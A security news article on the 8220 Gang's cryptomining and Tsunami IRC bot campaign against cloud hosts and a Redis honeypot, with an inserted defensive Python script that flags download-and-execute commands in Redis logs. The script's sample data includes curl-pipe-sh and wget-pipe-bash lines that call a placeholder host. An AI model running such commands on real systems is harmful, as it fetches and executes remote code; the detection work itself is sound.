IRC bots and miners used by the 8220 Gang to hit cloud providers

January 30, 2023
Tags: IRC Bots, Miners, 8220 Gang, Cloud Providers, Cryptocurrency

A Chinese-speaking hacking group, 8220 Gang, has used cryptocurrency miners and IRC (Internet Relay Chat) bots to target cloud service providers and unsecured applications. The gang utilised cryptominers and botnets for financial gain on public cloud infrastructure.

Researchers explained that the 8220 Gang is a malicious group specialising in cryptomining operations against public cloud environments. Public clouds currently offer their subscribers large, elastically scalable amounts of compute, which attracts cybercriminals running cryptomining attacks.

The group uses several strategies to hide its activities and evade security detection. One of its tactics is a blocklist of known honeypot addresses, which keeps its scanners from being caught on honeypots.

Additionally, this group has been using the Tsunami IRC bot, one of the earliest IoT botnets. The attackers have also used the IRC protocol for their command-and-control communication.

Figure: The 8220 Gang used a server hosted on a cloud provider.

The source IP address used by the 8220 Gang for its campaigns belonged to an infected Apache server hosted on a cloud provider. From this address, the group sent scripted commands to Radware’s Redis honeypot.

The group's commands download, install and run a shell script, which in turn deploys the cryptominer, a Python script and the Tsunami IRC bot on the system running Redis.
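As an added illustration, not part of the original article or of Radware's honeypot tooling, the Python script below scans Redis MONITOR-style log lines for values that embed a download-and-execute shell command, the kind of scripted instruction described above. The log line format and the sample lines are assumed and constructed; the domain is a placeholder.

```python
import re

# Assumed Redis MONITOR line format: <timestamp> [<db> <client-ip>:<port>] "<cmd>" "<arg>" ...
# (redis-cli shows it without the leading "+"; the raw protocol includes it, so both are accepted)
MONITOR_RE = re.compile(
    r'^\+?(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<src>[\d.]+):(?P<port>\d+)\] (?P<rest>.*)$'
)
# One double-quoted argument, allowing backslash escapes as MONITOR prints them
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample: two clients, one of them staging download-and-execute payloads
SAMPLE_MONITOR = [
    '1675036800.100000 [0 203.0.113.10:51234] "SET" "session:42" "user=alice"',
    '1675036801.200000 [0 198.51.100.7:40001] "SET" "x" "curl -fsSL http://example.invalid/drop.sh | sh"',
    '1675036802.300000 [0 203.0.113.10:51234] "SET" "docs" "see wget docs"',
    '+1675036803.400000 [0 198.51.100.7:40001] "SET" "y" "wget -q -O- https://example.invalid/i.sh | bash"',
    'not a monitor line at all',
]


def parse_monitor_line(line):
    """Return {ts, src, cmd, args} for one MONITOR line, or None if it does not match."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group("rest"))
    if not args:
        return None
    return {"ts": float(m.group("ts")), "src": m.group("src"),
            "cmd": args[0].upper(), "args": args[1:]}


def is_download_and_execute(text):
    """True when a value carries a fetch tool, a URL and a shell invocation together."""
    t = text.lower()
    return bool(re.search(r"\b(curl|wget)\b", t)
                and re.search(r"https?://", t)
                and re.search(r"\b(ba)?sh\b", t))


def find_staged_payloads(lines):
    """Return (source_ip, command, value) for every argument that looks like a staged payload."""
    hits = []
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        for arg in ev["args"]:
            if is_download_and_execute(arg):
                hits.append((ev["src"], ev["cmd"], arg))
                break  # one hit per line is enough for triage
    return hits


if __name__ == "__main__":
    for src, cmd, value in find_staged_payloads(SAMPLE_MONITOR):
        print(f"suspicious {cmd} from {src}: {value}")
```

On a real deployment, feed the output of `redis-cli MONITOR` (or an equivalent honeypot log) into `find_staged_payloads` and alert on the source IPs it returns.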

Furthermore, the PwnRig cryptominer used by the threat actors consumes the targeted systems' CPU and GPU resources, slowing them down. Because cloud resources are metered, the extra consumption on the infected machines translates directly into higher invoices for the victim.

Once the infection succeeds, the actors reuse the same intrusion tactic to install additional malware payloads, such as RATs and keyloggers.

The actors use these malicious tools to carry out cybercriminal activities such as unauthorised access, ransomware deployment and information stealing.

Finally, the IRC bot supports several denial-of-service attacks, including SYN and UDP floods, which can cause further financial losses for the infected victim.

This recent campaign from the 8220 Gang shows how exposed poorly secured cloud environments and misconfigured applications are. Users with weak credentials and outdated applications are the most prone to these attacks.

Organisations should fortify their defences with intelligent security controls and incident response capabilities to mitigate the effects of such campaigns.
